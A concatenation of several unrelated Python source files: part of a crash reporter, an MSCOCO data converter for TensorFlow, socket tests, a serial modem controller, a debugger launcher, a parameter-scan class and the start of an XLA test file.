if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def _get_traceback_str(self) -> str:
return "".join(traceback.format_exception(*self.exc_args))
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
build_mscoco_data.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_train2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with tf.gfile.FastGFile(image.filename, "r") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
thread_index: Integer thread identifier within [0, len(ranges)].
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
writer.close()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in xrange(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Proccessing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
|
test_socket_jy.py | import errno
import os
import socket
import ssl
import threading
import time
import unittest
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from test import test_support
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
CERTFILE = data_file("keycert.pem")
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
def start_server():
server_address = ('127.0.0.1', 0)
class DaemonThreadingMixIn(ThreadingMixIn):
daemon_threads = True
class ThreadedHTTPServer(DaemonThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
# not actually going to do anything with this server, so a
# do-nothing handler is reasonable
httpd = ThreadedHTTPServer(server_address, BaseHTTPRequestHandler)
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.daemon = True
server_thread.start()
return httpd, server_thread
class SocketConnectTest(unittest.TestCase):
def setUp(self):
self.httpd, self.server_thread = start_server()
self.address = self.httpd.server_name, self.httpd.server_port
def tearDown(self):
self.httpd.shutdown()
self.server_thread.join()
def do_nonblocking_connection(self, results, index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
connect_errno = 0
connect_attempt = 0
while connect_errno != errno.EISCONN and connect_attempt < 10000:
connect_attempt += 1
connect_errno = sock.connect_ex(self.address)
results[index].append(connect_errno)
time.sleep(0.01)
sock.close()
def do_workout(self, num_threads=10):
connect_results = []
connect_threads = []
for i in xrange(num_threads):
connect_results.append([])
connect_threads.append(threading.Thread(
target=self.do_nonblocking_connection,
name="socket-workout-%s" % i,
args=(connect_results, i)))
for thread in connect_threads:
thread.start()
for thread in connect_threads:
thread.join()
return connect_results
def test_connect_ex_workout(self):
"""Verify connect_ex states go through EINPROGRESS?, EALREADY*, EISCONN"""
# Tests fix for http://bugs.jython.org/issue2428; based in part on the
# code showing failure that was submitted with that bug
for result in self.do_workout():
self.assertIn(result[0], {errno.EINPROGRESS, errno.EISCONN})
self.assertEqual(result[-1], errno.EISCONN)
for code in result[1:-1]:
self.assertEqual(code, errno.EALREADY)
class SSLSocketConnectTest(unittest.TestCase):
def setUp(self):
self.httpd, self.server_thread = start_server()
self.httpd.socket = ssl.wrap_socket(
self.httpd.socket,
certfile=ONLYCERT,
server_side=True,
keyfile=ONLYKEY,
)
self.address = self.httpd.server_name, self.httpd.server_port
def tearDown(self):
self.httpd.shutdown()
self.server_thread.join()
def do_nonblocking_connection(self, results, index):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
connect_errno = 0
connect_attempt = 0
sock = ssl.wrap_socket(sock, certfile=CERTFILE, do_handshake_on_connect=True)
while connect_errno != errno.EISCONN and connect_attempt < 10000:
connect_attempt += 1
connect_errno = sock.connect_ex(self.address)
results[index].append(connect_errno)
time.sleep(0.01)
sock.close()
def do_workout(self, num_threads=10):
connect_results = []
connect_threads = []
for i in xrange(num_threads):
connect_results.append([])
connect_threads.append(threading.Thread(
target=self.do_nonblocking_connection,
name="socket-workout-%s" % i,
args=(connect_results, i)))
for thread in connect_threads:
thread.start()
for thread in connect_threads:
thread.join()
return connect_results
def test_connect_ex_workout(self):
"""Verify connect_ex states go through EINPROGRESS?, EALREADY*, EISCONN"""
# Tests fix for http://bugs.jython.org/issue2428; based in part on the
# code showing failure that was submitted with that bug
for result in self.do_workout():
self.assertIn(result[0], {errno.EINPROGRESS, errno.EISCONN})
self.assertEqual(result[-1], errno.EISCONN)
for code in result[1:-1]:
self.assertEqual(code, errno.EALREADY)
class SocketOptionsTest(unittest.TestCase):
def test_socket_options_defined(self):
# Basic existence test to verify trivial fix for
# http://bugs.jython.org/issue2436
self.assertEqual(socket.SOL_TCP, socket.IPPROTO_TCP)
def test_main():
test_support.run_unittest(SocketConnectTest, SSLSocketConnectTest, SocketOptionsTest)
if __name__ == "__main__":
test_main()
|
serial_service.py | import time
import serial
import threading
def serial_service(serial_dict):
# Connect to uno board and sim board
sim_serial = serial.Serial("/dev/ttyAMA0", 19200, timeout=1)
uno_serial = serial.Serial("/dev/ttyUSB0", 115200, timeout=1)
# Check the connection
if uno_serial.isOpen():
serial_dict['UNO_OK'] = True
uno_thread = threading.Thread(target=uno_translator, args=(uno_serial, serial_dict))
else:
serial_dict['UNO_OK'] = False
uno_thread = None
if sim_serial.isOpen():
serial_dict['SIM_OK'] = True
sim_serial.write("AT+CLCC=1".encode("utf-8"))
sim_serial.write("AT+CMGF=1".encode("utf-8"))
sim_serial.write("AT+CHFA=1".encode("utf-8"))
sim_serial.write("ATM6".encode("utf-8"))
sim_serial.write("ATL6".encode("utf-8"))
sim_thread = threading.Thread(target=sim_translator, args=(sim_serial, serial_dict))
else:
serial_dict['SIM_OK'] = False
sim_thread = None
# Create thread to begin send and receive message
try:
if uno_thread is not None:
uno_thread.start()
if sim_thread is not None:
sim_thread.start()
while True:
if uno_thread.isAlive() is False:
serial_dict['UNO_OK'] = False
uno_thread.start()
if sim_thread.isAlive() is False:
serial_dict['SIM_OK'] = False
sim_thread.start()
uno_thread.join()
sim_thread.join()
except:
print(">>>serialController:Something wrong! Can't open thread.")
def uno_translator(uno_serial, serial_dict):
while True:
# Send message to UNO board
if 'UNO_GPS' in serial_dict.keys():
AT = "GPS"
uno_serial.write(AT.encode("utf-8"))
del serial_dict['UNO_GPS']
time.sleep(0.2)
# Receive message from UNO board
count = uno_serial.inWaiting()
if count != 0:
recv = uno_serial.readline()
recv = recv.decode().rstrip()
# Some code to analysis
# This code can handle:
# RATE:59
# LNG:116403963
# LAT:39915119
AT = recv.split(':')
if len(AT) != 2 or len(AT[1]) == 0:
continue
serial_dict[AT[0]] = int(AT[1])
def sim_translator(sim_serial, serial_dict):
while True:
# Make a call
if 'SIM_ATD' in serial_dict.keys():
AT = "ATD" + serial_dict['PHONE'] + ";"
sim_serial.write(AT.encode("utf-8"))
del serial_dict['SIM_ATD']
time.sleep(0.5)
# Begin to receive AT
count = sim_serial.inWaiting()
if count != 0:
recv = sim_serial.readline()
recv = recv.decode().rstrip()
# Some code to analysis
if recv == 'OK':
continue
elif recv == 'RING':
# Phone in
serial_dict['SIM_PHO'] = 'Incoming'
elif recv == 'NO DIALTONE' or recv == 'NO ANSWER':
# Phone out and no answer
serial_dict['SIM_PHO'] = 'Fail'
elif recv == 'BUSY' or recv == 'NO CARRIER':
# Phone close
serial_dict['SIM_PHO'] = 'Close'
elif recv[0:4] == '+CLCC':
# Connect status update
AT = recv.split(',')
# To analysis the phone come from
if AT[5].strip('"') == serial_dict['PHONE']:
# Receive call from target.
AT = "ATA"
sim_serial.write(AT.encode("utf-8"))
time.sleep(0.2)
else:
# Receive call from stranger.
AT = "ATH"
sim_serial.write(AT.encode("utf-8"))
time.sleep(0.2)
# To set led light status
if AT[1] == "0":
serial_dict['SIM_STA'] = 'On'
elif AT[1] == "6":
serial_dict['SIM_STA'] = 'Close'
else:
serial_dict['SIM_STA'] = 'Waiting'
elif recv[0:4] == '+CMTI':
# Receive message and delete.
AT = 'AT+CMGD="DEL ALL"'
sim_serial.write(AT.encode("utf-8"))
time.sleep(0.2)
# Analysis end
|
debuggee.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import atexit
import os
import struct
import subprocess
import sys
import threading
from debugpy import launcher
from debugpy.common import fmt, log, messaging, compat
from debugpy.launcher import output
process = None
"""subprocess.Popen instance for the debuggee process."""
wait_on_exit_predicates = []
"""List of functions that determine whether to pause after debuggee process exits.
Every function is invoked with exit code as the argument. If any of the functions
returns True, the launcher pauses and waits for user input before exiting.
"""
def describe():
return fmt("Debuggee[PID={0}]", process.pid)
def spawn(process_name, cmdline, cwd, env, redirect_output):
log.info(
"Spawning debuggee process:\n\n"
"Current directory: {0!j}\n\n"
"Command line: {1!j}\n\n"
"Environment variables: {2!j}\n\n",
cwd,
cmdline,
env,
)
close_fds = set()
try:
if redirect_output:
# subprocess.PIPE behavior can vary substantially depending on Python version
# and platform; using our own pipes keeps it simple, predictable, and fast.
stdout_r, stdout_w = os.pipe()
stderr_r, stderr_w = os.pipe()
close_fds |= {stdout_r, stdout_w, stderr_r, stderr_w}
kwargs = dict(stdout=stdout_w, stderr=stderr_w)
else:
kwargs = {}
try:
global process
process = subprocess.Popen(cmdline, cwd=cwd, env=env, bufsize=0, **kwargs)
except Exception as exc:
raise messaging.MessageHandlingError(
fmt("Couldn't spawn debuggee: {0}\n\nCommand line:{1!r}", exc, cmdline)
)
log.info("Spawned {0}.", describe())
atexit.register(kill)
launcher.channel.send_event(
"process",
{
"startMethod": "launch",
"isLocalProcess": True,
"systemProcessId": process.pid,
"name": process_name,
"pointerSize": struct.calcsize(compat.force_str("P")) * 8,
},
)
if redirect_output:
for category, fd, tee in [
("stdout", stdout_r, sys.stdout),
("stderr", stderr_r, sys.stderr),
]:
output.CaptureOutput(describe(), category, fd, tee)
close_fds.remove(fd)
wait_thread = threading.Thread(target=wait_for_exit, name="wait_for_exit()")
wait_thread.daemon = True
wait_thread.start()
finally:
for fd in close_fds:
try:
os.close(fd)
except Exception:
log.swallow_exception()
def kill():
if process is None:
return
try:
if process.poll() is None:
log.info("Killing {0}", describe())
process.kill()
except Exception:
log.swallow_exception("Failed to kill {0}", describe())
def wait_for_exit():
try:
code = process.wait()
if sys.platform != "win32" and code < 0:
# On POSIX, if the process was terminated by a signal, Popen will use
# a negative returncode to indicate that - but the actual exit code of
# the process is always an unsigned number, and can be determined by
# taking the lowest 8 bits of that negative returncode.
code &= 0xFF
except Exception:
log.swallow_exception("Couldn't determine process exit code:")
code = -1
log.info("{0} exited with code {1}", describe(), code)
output.wait_for_remaining_output()
# Determine whether we should wait or not before sending "exited", so that any
# follow-up "terminate" requests don't affect the predicates.
should_wait = any(pred(code) for pred in wait_on_exit_predicates)
try:
launcher.channel.send_event("exited", {"exitCode": code})
except Exception:
pass
if should_wait:
_wait_for_user_input()
try:
launcher.channel.send_event("terminated")
except Exception:
pass
def _wait_for_user_input():
if sys.stdout and sys.stdin:
from debugpy.common import log
can_getch = sys.stdin.isatty()
if can_getch:
try:
import msvcrt
except ImportError:
can_getch = False
if can_getch:
log.debug("msvcrt available - waiting for user input via getch()")
sys.stdout.write("Press any key to continue . . . ")
sys.stdout.flush()
msvcrt.getch()
else:
log.debug("msvcrt not available - waiting for user input via read()")
sys.stdout.write("Press Enter to continue . . . ")
sys.stdout.flush()
sys.stdin.read(1)
|
scan.py | import time
from numpy.linalg import norm
import numpy as np
from multiprocessing import Process, Manager, Lock, Pool
from ctypes import c_int
from itertools import product
import pandas as pd
Ntotlock = Lock()
class Scan:
def __init__(self, likelihood, par_min, par_max, N_iters):
self.likelihood = likelihood
if isinstance(par_min, float) and isinstance(par_max, float):
self.Npars = 1
self.par_min = [par_min,]
self.par_max = [par_max,]
elif len(par_min) == len(par_max):
self.Npars = len(par_min)
self.par_min = par_min
self.par_max = par_max
else:
raise Exception("The length of the limits of the parameter doesn't match!")
self.N_iters = N_iters
self.points = []
self.lh_list = []
self.Ntot = 0
self.mp = False
def run(self, *args):
raise NotImplementedError("You have to define the scan")
def run_time(self, *args):
self.start = time.time()
self.run(*args)
self.end = time.time()
print("Running time: " + str(self.end-self.start) + 's')
def increasecounter(self, Ntot):
if self.mp:
with Ntotlock:
self.Ntot.value += Ntot
else:
self.Ntot += Ntot
def run_mp(self, cores, *args):
self.mp = True
with Manager() as manager:
self.points = manager.list(self.points)
self.lh_list = manager.list(self.lh_list)
self.Ntot = manager.Value(c_int, self.Ntot)
processes = []
for i in range(0, cores):
p = Process(target = self.run, args = args)
p.start()
np.random.seed(int(p.pid + time.time())) #We have to reseed each process, or else they will produce the same random numbers
processes.append(p)
for p in processes:
p.join()
self.points = list(self.points)
self.lh_list = list(self.lh_list)
self.Ntot = int(self.Ntot.value)
self.mp = False
def run_mp_time(self, cores):
self.start = time.time()
self.run_mp(cores)
self.end = time.time()
print("Running time: " + str(self.end-self.start) + 's')
def clear(self):
self.points = []
self.lh_list = []
self.Ntot = 0
def get_points(self):
return self.points
def get_lh_list(self, index=None):
if index == None:
return self.lh_list
else:
s = []
for i in range(0, len(self.lh_list)):
s.append(self.lh_list[i][index])
return s
def get_point_series(self, coord):
s = []
for i in range(0, len(self.points)):
s.append(self.points[i][coord])
return s
def interpolate(self, point):
num = 0
den = 0
for i in range(0, len(self.points)):
d = norm(np.array(point) - np.array(self.points[i]))
if d == 0:
return self.lh_list[i]
else:
num += self.lh_list[i]/d**4
den += 1/d**4
return num/den
def write(self, fout, mode='wt'):
with open(fout, mode) as f:
for p, l in zip(self.points, self.lh_list):
for i in range(0, self.Npars):
f.write(str(p[i])+'\t')
f.write(str(l)+'\n')
def save_csv(self, fout):
df_points = pd.DataFrame(self.points, columns=['x','y'])
df_lh = pd.DataFrame(self.lh_list)
df_total = pd.concat([df_points, df_lh], axis=1, join='outer')
df_total.to_csv(fout, sep='\t', index=False)
def inthebox(self, point):
for p in range(0, self.Npars):
if point[p] < self.par_min[p]:
return False
if point[p] > self.par_max[p]:
return False
return True
def acceptance(self):
return len(self.points)/self.Ntot
def bestpoint(self):
return self.points[np.argmax(self.lh_list)]
def expectedvalue(self, func, *args):
lhmax = np.max(self.lh_list)
num = 0
den = 0
for p, l in zip(self.points, self.lh_list):
expl = np.exp(l-lhmax)
num += func(p, *args) * expl
den += expl
return num/den
def expectedvalue_mp(self, func, cores, *args):
lhmax = np.max(self.lh_list)
num = 0
den = 0
with Pool(processes=cores) as pool:
argl = []
for arg in args:
argl.append([arg])
flist = pool.starmap(func, product(self.points, *argl))
for i, l in enumerate(self.lh_list):
expl = np.exp(l-lhmax)
num += flist[i] * expl
den += expl
return num/den
|
xla_client_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
